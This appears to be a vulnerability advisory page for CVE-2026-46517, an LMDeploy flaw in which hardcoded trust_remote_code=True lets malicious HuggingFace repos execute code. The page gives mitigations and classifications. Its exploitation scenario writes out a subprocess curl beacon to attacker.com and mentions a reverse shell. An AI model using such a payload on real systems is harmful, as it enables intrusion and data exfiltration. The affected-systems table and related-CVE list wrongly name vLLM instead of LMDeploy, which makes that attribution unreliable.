LMDeploy hardcodes `trust_remote_code=True` across all model-loading code paths—including architecture detection, quantization, and calibration CLIs—with no CLI flag, environment variable, or warning allowing users to opt out, silently overriding HuggingFace Transformers' default-secure stance introduced in transformers ≥ 4.30 precisely to prevent this class of attack. Any user running `lmdeploy serve`, `lmdeploy lite calibrate`, or any downstream quant workflow against a third-party HuggingFace repository is implicitly exposed: a malicious repo needs only a `configuration_*.py` with top-level `os.system()` to achieve code execution at the moment the model config is fetched—before inference even begins. With 127 downstream dependents and no patch available as of publication, the blast radius extends beyond direct LMDeploy users to tools and platforms built on it; CI/CD pipelines automatically pulling model updates by tag are particularly high-risk targets. Until an upstream fix adding an opt-in `--trust-remote-code` flag lands, restrict LMDeploy to internally vetted, SHA-pinned model repositories and sandbox all inference workloads with minimal OS privileges.
What is the risk?
CVSS 7.8 High (AV:L/AC:L/PR:N/UI:R) understates practical risk in AI/ML environments where loading third-party HuggingFace models is standard workflow. No patch exists (affects lmdeploy ≤ 0.12.3, no patched version available). The absence of any opt-out mechanism means every LMDeploy installation loading non-internal models is affected by default. Exploitation complexity is trivial: publishing a malicious HF repo requires no special skills, and the attack triggers automatically on any lmdeploy command pointing at it. Mitigating factors are no CISA KEV status and no observed in-the-wild exploitation, but the ease of weaponization and the growing footprint of LMDeploy in enterprise AI inference pipelines elevate this beyond routine hardening.
How does the attack unfold?
What systems are affected?
| Package | Ecosystem | Vulnerable Range | Patched |
|---|---|---|---|
| vLLM | pip | <= 0.12.3 | No patch |
Do you use vLLM? You're affected.
How severe is it?
What is the attack surface?
What should I do?
1 step-
1) Immediately restrict LMDeploy to internally hosted or SHA-pinned model repositories—do not load any third-party HuggingFace repo without manual inspection of configuration_*.py files. 2) Run LMDeploy processes in rootless containers with seccomp/AppArmor profiles and no network egress to limit code execution blast radius. 3) Audit CI/CD pipelines for any dynamic model source references (floating version tags, user-supplied repo names) and replace with pinned commit SHAs. 4) Monitor HuggingFace model repos used in your pipelines for unexpected additions of configuration_*.py or auto_map keys in config.json. 5) Apply the suggested upstream patch manually if building from source: replace all hardcoded
trust_remote_code=Truewith a parameter defaulting False and wire a--trust-remote-codeCLI flag through all entry points. 6) Track the upstream GitHub Security Advisory GHSA-9xq9-36w5-q796 for patch availability.
What does CISA's SSVC say?
Source: CISA Vulnrichment (SSVC v2.0). Decision based on the CISA Coordinator decision tree.
How is it classified?
Which compliance frameworks are affected?
This CVE is relevant to:
Frequently Asked Questions
What is CVE-2026-46517?
LMDeploy hardcodes `trust_remote_code=True` across all model-loading code paths—including architecture detection, quantization, and calibration CLIs—with no CLI flag, environment variable, or warning allowing users to opt out, silently overriding HuggingFace Transformers' default-secure stance introduced in transformers ≥ 4.30 precisely to prevent this class of attack. Any user running `lmdeploy serve`, `lmdeploy lite calibrate`, or any downstream quant workflow against a third-party HuggingFace repository is implicitly exposed: a malicious repo needs only a `configuration_*.py` with top-level `os.system()` to achieve code execution at the moment the model config is fetched—before inference even begins. With 127 downstream dependents and no patch available as of publication, the blast radius extends beyond direct LMDeploy users to tools and platforms built on it; CI/CD pipelines automatically pulling model updates by tag are particularly high-risk targets. Until an upstream fix adding an opt-in `--trust-remote-code` flag lands, restrict LMDeploy to internally vetted, SHA-pinned model repositories and sandbox all inference workloads with minimal OS privileges.
Is CVE-2026-46517 actively exploited?
No confirmed active exploitation of CVE-2026-46517 has been reported, but organizations should still patch proactively.
How to fix CVE-2026-46517?
1) Immediately restrict LMDeploy to internally hosted or SHA-pinned model repositories—do not load any third-party HuggingFace repo without manual inspection of configuration_*.py files. 2) Run LMDeploy processes in rootless containers with seccomp/AppArmor profiles and no network egress to limit code execution blast radius. 3) Audit CI/CD pipelines for any dynamic model source references (floating version tags, user-supplied repo names) and replace with pinned commit SHAs. 4) Monitor HuggingFace model repos used in your pipelines for unexpected additions of configuration_*.py or auto_map keys in config.json. 5) Apply the suggested upstream patch manually if building from source: replace all hardcoded `trust_remote_code=True` with a parameter defaulting False and wire a `--trust-remote-code` CLI flag through all entry points. 6) Track the upstream GitHub Security Advisory GHSA-9xq9-36w5-q796 for patch availability.
What systems are affected by CVE-2026-46517?
This vulnerability affects the following AI/ML architecture patterns: model serving, inference infrastructure, training pipelines, CI/CD model pipelines.
What is the CVSS score for CVE-2026-46517?
CVE-2026-46517 has a CVSS v3.1 base score of 7.8 (HIGH). The EPSS exploitation probability is 0.15%.
What is the AI security impact?
Affected AI Architectures
MITRE ATLAS Techniques
AML.T0010.003 Model AML.T0011 User Execution AML.T0011.000 Unsafe AI Artifacts AML.T0058 Publish Poisoned Models AML.T0074 Masquerading Compliance Controls Affected
What are the technical details?
Original Advisory
LMDeploy is a toolkit for compressing, deploying, and serving large language models. In versions 0.12.3 and prior, hardcoded "trust_remote_code=True" enables HF supply-chain RCE without user opt-in. At time of publication, there are no publicly available patches.
Exploitation Scenario
An adversary creates a HuggingFace model repository impersonating a popular open-source model variant (e.g., a fine-tuned InternLM or Qwen variant) and embeds a malicious `configuration_evil.py` containing `import subprocess; subprocess.Popen(['curl','https://attacker.com/beacon?h='+__import__('socket').gethostname()])` as top-level module code. The adversary promotes the repo via ML community forums, a GitHub tutorial, or dependency confusion against a common internal model alias. An ML engineer or automated pipeline runs `lmdeploy serve api_server attacker/evil-model`; LMDeploy calls `get_model_arch()` which invokes `AutoConfig.from_pretrained(repo, trust_remote_code=True)`; HuggingFace Transformers downloads and `importlib`-imports the malicious Python file, executing the attacker's beacon—or a reverse shell—as the inference server process user. On shared GPU infrastructure this gives the adversary access to model weights, API keys in environment variables, and lateral movement paths to other workloads.
Weaknesses (CWE)
CWE-1188 Initialization of a Resource with an Insecure Default
Primary
CWE-1188 Initialization of a Resource with an Insecure Default
Primary
CWE-915 Improperly Controlled Modification of Dynamically-Determined Object Attributes
Primary
CWE-915 Improperly Controlled Modification of Dynamically-Determined Object Attributes
Primary
CWE-94 Improper Control of Generation of Code ('Code Injection')
Primary
CWE-94 Improper Control of Generation of Code ('Code Injection')
Primary
CWE-1188 Initialization of a Resource with an Insecure Default CWE-915 Improperly Controlled Modification of Dynamically-Determined Object Attributes CWE-94 Improper Control of Generation of Code ('Code Injection') CWE-1188 — Initialization of a Resource with an Insecure Default: The product initializes or sets a resource with a default that is intended to be changed by the product's installer, administrator, or maintainer, but the default is not secure.
Source: MITRE CWE corpus.
CVSS Vector
CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H References
Timeline
Related Vulnerabilities
CVE-2024-9053 9.8 vllm: RCE via unsafe pickle deserialization in RPC server
Same package: vllm CVE-2024-11041 9.8 vllm: RCE via unsafe pickle deserialization in MessageQueue
Same package: vllm CVE-2026-25960 9.8 vllm: SSRF allows internal network access
Same package: vllm CVE-2025-47277 9.8 vLLM: RCE via exposed TCPStore in distributed inference
Same package: vllm CVE-2025-32444 9.8 vLLM: RCE via pickle deserialization on ZeroMQ
Same package: vllm